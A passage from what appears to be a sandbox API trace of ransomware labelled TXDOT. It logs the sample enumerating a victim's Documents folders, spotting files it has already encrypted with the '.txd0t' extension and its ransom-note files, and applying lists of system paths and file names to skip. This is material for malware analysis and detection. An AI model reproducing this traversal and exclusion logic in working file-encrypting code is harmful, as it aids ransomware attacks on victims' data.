cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.134] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.134] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.134] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0090.134] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0090.134] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt" [0090.134] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.134] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.134] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.134] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.134] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.134] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.134] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.135] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.135] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd4b9150, ftCreationTime.dwHighDateTime=0x1d5e525, ftLastAccessTime.dwLowDateTime=0xea2cfea0, ftLastAccessTime.dwHighDateTime=0x1d5eb86, ftLastWriteTime.dwLowDateTime=0x519589ba, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18385, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="8GgGCWAXxjKLpeoA40OY.odp.txd0t", cAlternateFileName="8GGGCW~1.TXD")) returned 1 [0090.135] StrCmpW (psz1="8GgGCWAXxjKLpeoA40OY.odp.txd0t", psz2=".") returned 1 [0090.135] StrCmpW (psz1="8GgGCWAXxjKLpeoA40OY.odp.txd0t", psz2="..") returned 1 [0090.135] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0090.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0090.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="8GgGCWAXxjKLpeoA40OY.odp.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t" [0090.135] PathFindExtensionW (pszPath="8GgGCWAXxjKLpeoA40OY.odp.txd0t") returned=".txd0t" [0090.135] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.135] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbf0b10, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0xe1aa4ee0, ftLastAccessTime.dwHighDateTime=0x1d5e1db, ftLastWriteTime.dwLowDateTime=0x51f4e844, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x80cf, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="hnSSITWu7H4.odt.txd0t", cAlternateFileName="HNSSIT~1.TXD")) returned 1 [0090.135] StrCmpW (psz1="hnSSITWu7H4.odt.txd0t", psz2=".") returned 1 [0090.135] StrCmpW (psz1="hnSSITWu7H4.odt.txd0t", psz2="..") returned 1 [0090.135] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0090.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0090.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="hnSSITWu7H4.odt.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t" [0090.135] PathFindExtensionW (pszPath="hnSSITWu7H4.odt.txd0t") returned=".txd0t" [0090.135] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.135] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43a94a60, ftCreationTime.dwHighDateTime=0x1d5ed12, ftLastAccessTime.dwLowDateTime=0x464da5e0, ftLastAccessTime.dwHighDateTime=0x1d5e600, ftLastWriteTime.dwLowDateTime=0x5197eacc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4b8c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="j7-b.pdf.txd0t", cAlternateFileName="J7-BPD~1.TXD")) returned 1 [0090.135] StrCmpW (psz1="j7-b.pdf.txd0t", psz2=".") returned 1 [0090.135] StrCmpW (psz1="j7-b.pdf.txd0t", psz2="..") returned 1 [0090.135] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0090.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0090.135] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="j7-b.pdf.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t" [0090.135] PathFindExtensionW (pszPath="j7-b.pdf.txd0t") returned=".txd0t" [0090.135] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.135] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcadeab70, ftCreationTime.dwHighDateTime=0x1d5e9c4, ftLastAccessTime.dwLowDateTime=0xa568d710, ftLastAccessTime.dwHighDateTime=0x1d5ebbf, ftLastWriteTime.dwLowDateTime=0x5197eacc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x74c4, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="LFpWuQJ-aF.doc.txd0t", cAlternateFileName="LFPWUQ~1.TXD")) returned 1 [0090.136] StrCmpW (psz1="LFpWuQJ-aF.doc.txd0t", psz2=".") returned 1 [0090.136] StrCmpW (psz1="LFpWuQJ-aF.doc.txd0t", psz2="..") returned 1 [0090.136] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0090.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0090.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="LFpWuQJ-aF.doc.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t" [0090.136] PathFindExtensionW (pszPath="LFpWuQJ-aF.doc.txd0t") returned=".txd0t" [0090.136] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.136] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e3bae0, ftCreationTime.dwHighDateTime=0x1d5ea3a, ftLastAccessTime.dwLowDateTime=0xace66270, ftLastAccessTime.dwHighDateTime=0x1d5ef41, ftLastWriteTime.dwLowDateTime=0x519a4caf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaf0b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="wUuIQI1na.odp.txd0t", cAlternateFileName="WUUIQI~1.TXD")) returned 1 [0090.136] StrCmpW (psz1="wUuIQI1na.odp.txd0t", psz2=".") returned 1 [0090.136] StrCmpW (psz1="wUuIQI1na.odp.txd0t", psz2="..") returned 1 [0090.136] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0090.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0090.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="wUuIQI1na.odp.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t" [0090.136] PathFindExtensionW (pszPath="wUuIQI1na.odp.txd0t") returned=".txd0t" [0090.136] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.136] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e3bae0, ftCreationTime.dwHighDateTime=0x1d5ea3a, ftLastAccessTime.dwLowDateTime=0xace66270, ftLastAccessTime.dwHighDateTime=0x1d5ef41, ftLastWriteTime.dwLowDateTime=0x519a4caf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaf0b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="wUuIQI1na.odp.txd0t", cAlternateFileName="WUUIQI~1.TXD")) returned 0 [0090.136] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0090.136] GetProcessHeap () returned 0xe30000 [0090.136] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7f38 | out: hHeap=0xe30000) returned 1 [0090.136] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebf37130, ftCreationTime.dwHighDateTime=0x1d5ed0f, ftLastAccessTime.dwLowDateTime=0xc2d85810, ftLastAccessTime.dwHighDateTime=0x1d5e6f2, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10e7a, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="xuaWupFvOSfqE.pps.txd0t", cAlternateFileName="XUAWUP~1.TXD")) returned 1 [0090.136] StrCmpW (psz1="xuaWupFvOSfqE.pps.txd0t", psz2=".") returned 1 [0090.136] StrCmpW (psz1="xuaWupFvOSfqE.pps.txd0t", psz2="..") returned 1 [0090.136] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0090.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0090.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="xuaWupFvOSfqE.pps.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t" [0090.136] PathFindExtensionW (pszPath="xuaWupFvOSfqE.pps.txd0t") returned=".txd0t" [0090.136] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.136] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_L78DH7wK y2TBjiEU", cAlternateFileName="_L78DH~1")) returned 1 [0090.136] StrCmpW (psz1="_L78DH7wK y2TBjiEU", psz2=".") returned 1 [0090.136] StrCmpW (psz1="_L78DH7wK y2TBjiEU", psz2="..") returned 1 [0090.136] StrCpyNW (in: psz1=0xec7a60, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0090.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0090.136] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="_L78DH7wK y2TBjiEU", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\system32\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\system\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\local\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\boot\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\perflogs\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\programdata\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\drivers\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\wsus\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="crypt_detect") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="cryptolocker") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="ransomware") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\WINDOWS") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.137] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\Program Files") returned 0x0 [0090.137] GetProcessHeap () returned 0xe30000 [0090.137] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f4) returned 0xec7f38 [0090.137] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.137] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\*", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*" [0090.137] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*", lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2430 [0090.137] StrCmpW (psz1=".", psz2=".") returned 0 [0090.137] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.138] StrCmpW (psz1="..", psz2=".") returned 1 [0090.138] StrCmpW (psz1="..", psz2="..") returned 0 [0090.138] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519f1183, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x519f1183, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519f1183, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.138] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.138] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.138] StrCpyNW (in: psz1=0xec7f38, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0090.138] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0090.138] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt" [0090.138] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.138] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.138] StrCmpIW 